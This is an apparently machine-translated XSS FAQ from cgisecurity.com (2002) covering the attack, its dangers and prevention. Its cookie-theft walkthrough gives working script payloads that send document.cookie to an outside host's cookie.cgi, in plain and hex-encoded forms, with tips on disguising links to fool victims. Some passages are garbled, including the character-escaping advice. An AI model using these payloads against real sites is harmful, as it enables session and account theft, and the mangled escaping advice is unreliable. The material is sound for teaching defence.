Cross-site scripting (XSS) FAQ

Original Author charlee, original link http://tech.idv2.com/2006/08/30/xss-faq/in a timely manner.

 

This article briefly introduces the basic knowledge of XSS and its hazards and prevention methods. What is mandatory for Web developers. Translated from http://www.cgisecurity.com/articles/xss-faq.shtml.

Introduction

Today's websites contain a lot of dynamic content to improve user experience, which is much more complex than in the past. The so-called dynamic content means that the Web application can output the corresponding content according to the user's environment and needs. A dynamic website is vulnerable to an "XSS attack "(Cross Site ScriptingSecurity experts usually writeXSS), While static sites are completely unaffected. This FAQ gives you a deeper understanding of such threats and provides suggestions on how to detect and prevent them.

What is a cross-site scripting attack?

Cross-Site Scripting(Also knownXSSAttackers use website vulnerabilities to steal information from users. When users browse websites, use instant messaging software, or even read emails, they usually click a link. Attackers can steal user information by inserting malicious code into the link. Attackers usually use a hexadecimal (or other encoding method) to encode the link, so that users do not doubt its legitimacy. After a website receives a request containing malicious code, it will generate a page containing malicious code, which looks like a legitimate page that the website should generate. Many popular message books and Forum programs allow users to post messages containing HTML and javascript. Assume that user a has published a post containing malicious scripts. When user B browses this post, the malicious script will be executed to steal session information of user B. Details about attack methods are described below.

What does XSS and CSS mean?

Cross Site Scripting is often abbreviatedCSS, But this worksStacked Style Sheets(Cascading Style Sheets, CSS. Therefore, someone abbreviated cross-site scripting attacksXSS. If you hear someone say "I have discovered an XSS vulnerability", it is obvious that he is talking about cross-site scripting attacks.

What are the dangers of XSS attacks?

To collect user information, attackers usually insert JavaScript, VBScript, ActiveX, or Flash into vulnerable programs to fool users (see the following section ). Once successful, they can steal user accounts, modify user settings, steal/pollute cookies, and make fake advertisements. A large number of malicious XSS attacks occur every day. Brett Moore's next article details "Denial of Service Attack" and the "Automatic attack" that users will suffer after reading only one article ".

• Http://archives.neohapsis.com/archives/vuln-dev/2002-q1/0311.html

Can you give several examples of cross-site scripting attacks?

The famous PHPnuke program has many XSS vulnerabilities. Because this program is very popular, Hackers often check it as an XSS attack object. The following describes several publicly reported attack methods.

• Http://www.cgisecurity.com/archive/php/phpNuke_cross_site_scripting.txt
• Http://www.cgisecurity.com/archive/php/phpNuke_CSS_5_holes.txt
• Http://www.cgisecurity.com/archive/php/phpNuke_2_more_CSS_holes.txt

Can you explain what XSS cookie Theft means?

Some of the following variables and insertion locations may need to be adjusted based on the Web program used as the attack object. Note that this is only an example of attack methods. In this example, we will use the cross-site scripting vulnerability in the "viriable" variable in the script "a. php" to attack through normal requests. This is the most common form of XSS attacks.

Step 1: Lock the target

When you find that a Web program has an XSS vulnerability, check whether it has set cookies. If a cookie is set anywhere on the website, you can steal it from the user.

Step 2: Test

Different attack methods may generate different XSS vulnerabilities. Therefore, test the vulnerability to make the output result look normal. Some malicious scripts will destroy the output page after being inserted. (Output results are very important to fool users. Therefore, attackers need to adjust the attack code to make the output look normal .)

Next, you need to insert Javascript (or other client scripts) into the URL that links to the page containing the XSS vulnerability ). The following lists links that are frequently used to test XSS vulnerabilities. When a user clicks these links, the cookie award is sent to www.cgisecurity.com/cgi-bin/cookie.cgi and displayed. If the result contains cookie information, the user's account may be hijacked.

A Javascript example of Cookie Stealing. The usage is as follows.

ASCII usage

http://host/a.php?variable="><script>document.location='http://www.cgisecurity.com/cgi-bin/cookie.cgi? '%20+document.cookie</script> 

Hexadecimal usage

http://host/a.php?variable=%22%3e%3c%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e%74%2e%6c%6f%63%61%74%69%6f%6e%3d%27%68%74%74%70%3a%2f%2f%77%77%77%2e%63%67%69%73%65%63%75%72%69%74%79 %2e%63%6f%6d%2f%63%67%69%2d%62%69%6e%2f%63%6f%6f%6b%69%65%2e%63%67%69%3f%27%20%2b%64%6f%63% 75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%3c%2f%73%63%72%69%70%74%3e

Note:: Each usage is first written as ASCII, and then written as hexadecimal to copy and paste.

1. "><script>document.location='http://www.cgisecurity.com/cgi-bin/cookie.cgi?' +document.cookie</script> HEX %22%3e%3c%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e%74%2e%6c%6f%63%61%74%69%6f%6e%3d%27 %68%74%74%70%3a%2f%2f%77%77%77%2e%63%67%69%73%65%63%75%72%69%74%79%2e%63%6f%6d%2f%63%67%69 %2d%62%69%6e%2f%63%6f%6f%6b%69%65%2e%63%67%69%3f%27%20%2b%64%6f%63%75%6d%65%6e%74%2e%63%6f %6f%6b%69%65%3c%2f%73%63%72%69%70%74%3e2. <script>document.location='http://www.cgisecurity.com/cgi-bin/cookie.cgi?' +document.cookie</script> HEX %3c%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e%74%2e%6c%6f%63%61%74%69%6f%6e%3d%27%68%74%74 %70%3a%2f%2f%77%77%77%2e%63%67%69%73%65%63%75%72%69%74%79%2e%63%6f%6d%2f%63%67%69%2d%62%69%6e %2f%63%6f%6f%6b%69%65%2e%63%67%69%3f%27%20%2b%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%3c %2f%73%63%72%69%70%74%3e3. ><script>document.location='http://www.cgisecurity.com/cgi-bin/cookie.cgi?' +document.cookie</script> HEX %3e%3c%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e%74%2e%6c%6f%63%61%74%69%6f%6e%3d%27%68%74 %74%70%3a%2f%2f%77%77%77%2e%63%67%69%73%65%63%75%72%69%74%79%2e%63%6f%6d%2f%63%67%69%2d%62%69 %6e%2f%63%6f%6f%6b%69%65%2e%63%67%69%3f%27%20%2b%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65 %3c%2f%73%63%72%69%70%74%3e

Step 3: Execute XSS

Send the completed URL by email or other means. Note that if you send a URL directly to someone else (via email, instant messaging software, or other means), you should encode it in hexadecimal format, because these URLs can be seen at a glance that contain malicious code, but after hexadecimal encoding, most people can be deceived.

Step 4: process the collected information

Once the user clicks Your URL, the corresponding data will be sent to your CGI script. In this way, you get the cookie information, and then you can use tools such as Websleuth to check whether the account can be stolen.

In the above example, we only bring the user to the cookie. cgi page. If you have time, you can redirect the user to the original page in CGI to steal information without knowing it.

Some email programs automatically execute the Javascript code in the attachment when opening the attachment. Even for large websites such as Hotmail, it filters many attachments to prevent cookie Theft.

How should I protect my website administrators?

This is a simple question.Do not trust any user to input and filter all special characters.In this way, the vast majority of XSS attacks can be eliminated. Another suggestion is to convert <and> to <and> when outputting the page. Remember that the XSS vulnerability is extremely destructive. Once exploited, it will cause great damage to your career. Attackers will make these vulnerabilities public, which will greatly reduce the user trust level of your website on the issue of user privacy. Of course, it is not enough to convert (and) into <and>. It is best to convert (and) into (and), # And & into # And &.

How Should users guard against such attacks?

The best way to protect yourself is to click the link on the website you want to visit. For example, if you access a website with a link pointing to CNN, do not click the link. Instead, visit the main site of CNN and use the search engine to find relevant content. This prevents more than 90% of XSS attacks. Sometimes XSS will automatically start when you open an email, open attachments, read the message board, and read the forum. When you open an email or read a post from someone you don't know on a public forum, you mustNote:. The best solution is to disable the Javascript function of the browser. In IE, you can set the security level to the highest level to prevent cookie Theft.

How common are XSS vulnerabilities?

Because XSS vulnerabilities are easily discovered in large websites, they are very popular in hacker circles. FBI.gov, CNN.com, Time.com, Ebay, Yahoo, Apple, Microsoft, Zdnet, Wired, and Newsbytes all have such XSS vulnerabilities.

On average, 10-25 XSS vulnerabilities are detected every month in commercial products.

Can encryption prevent XSS attacks?

Websites encrypted with SSL (https) are no better than websites that are not encrypted. Web programs still work in the same way, but attacks are achieved through encrypted connections. Some people think they are safe when they see the lock icon on the browser.

Can XSS vulnerabilities execute commands on servers?

The XSS vulnerability can cause malicious Javascript insertion, but its execution is subject to many restrictions. If attackers exploit browser vulnerabilities, they may execute commands on users' computers. Therefore, you can only execute commands on the client. In short, XSS vulnerabilities can trigger other vulnerabilities on the client.

What if I don't modify the CSS/XSS vulnerability?

If you do not modify the XSS vulnerability, users on your website will be threatened by tampering. Many large websites have discovered the XSS vulnerability, which has been widely recognized. If it is not modified, the person who finds it may warn your company to damage the company's reputation. The message that you refuse to modify the vulnerability will also be sent to the customer, resulting in a crisis of trust in the company. How can customers do business without trust?

This section introduces more details about XSS.

"Cross-site scripting tears holes in Net security"
Http://www.usatoday.com/life/cyber/tech/2001-08-31-hotmail-security-side.htm

Article on XSS holes
Http://www.perl.com/pub/a/2002/02/20/css.html

"CERT Advisory CA-2000-02 Malicious HTML Tags Embedded in Client Web Requests"
Http://www.cert.org/advisories/CA-2000-02.html

Paper on Removing Meta-characters from User Supplied Data in CGI Scripts.
Http://www.cert.org/tech_tips/cgi_metacharacters.html

Paper on Microsoft's Passport System
Http://eyeonsecurity.net/papers/passporthijack.html

Paper on Cookie Theft
Http://www.eccentrix.com/education/b0iler/tutorials/javascript.htm#cookies

The webappsec mailing list (Visit www. securityfocus for details)
Webappsec@securityfocus.com

Descrithanks to David Endler for reviewing this document.

Publish to the Public May 2002
Copyright May 2002 Cgisecurity.com